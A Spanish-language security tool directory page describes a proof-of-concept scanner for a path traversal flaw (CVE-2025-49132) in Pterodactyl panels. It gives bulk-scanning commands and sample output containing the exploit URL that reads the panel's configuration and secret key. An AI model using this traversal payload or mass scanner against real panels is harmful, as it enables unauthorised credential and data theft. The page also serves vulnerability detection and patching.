Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-49132_poc — Pterodactyl panel CVE-2025-49132 detección masiva ☝️🤓 | Kitploit
Herramientas/GitHubGitHub/qiaojojo/cve-2025-49132_poc
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubqiaojojo/cve-2025-49132_poc

CVE-2025-49132_poc

Pterodactyl panel CVE-2025-49132 detección masiva ☝️🤓

Ver Repositorio
4hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-49132_poc

Ejemplo de uso

  1. Escanear un solo objetivo:
root@kitploit:~
python3 CVE-2025-49132_poc.py -u http://pterodactyl.example.com
  1. Escanear una lista de objetivos:
root@kitploit:~
python3 CVE-2025-49132_poc.py -f lista_objetivos.txt
  1. Guardar resultados del escaneo:
root@kitploit:~
python3 CVE-2025-49132_poc.py -f lista_objetivos.txt -o resultados_escaneo.txt

Ejemplo de salida:

Cuando existe la vulnerabilidad:

root@kitploit:~
[+] Vulnerabilidad presente: Vulnerabilidad confirmada

    Detalles de la vulnerabilidad:
      • Tipo: Path traversal
      • Vector de ataque: Acceso a /locales/locale.json mediante parámetro de path traversal
      • URL de explotación: http://target.com/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app
      
    Impacto potencial:
      • Lectura de credenciales en el archivo de configuración del panel (.env)
      • Extracción de información sensible en la base de datos
      • Acceso a archivos de servidores de juegos administrados por el panel
    
    APP_KEY extraída: base64{{your_secret_key_here}}
    
    Recomendación: Actualice inmediatamente a Pterodactyl v1.11.11 o superior

Cuando no existe la vulnerabilidad:

root@kitploit:~
[-] Sin vulnerabilidad: No se encontró vulnerabilidad (código de estado: 404)

Resumen del escaneo:

root@kitploit:~
Resumen del escaneo:
  • Total de objetivos escaneados: 5
  • Objetivos vulnerables: 2
  • Objetivos seguros: 3

[!] Crítico: ¡Se detectaron sistemas vulnerables! Se requiere acción inmediata.
Descargar herramienta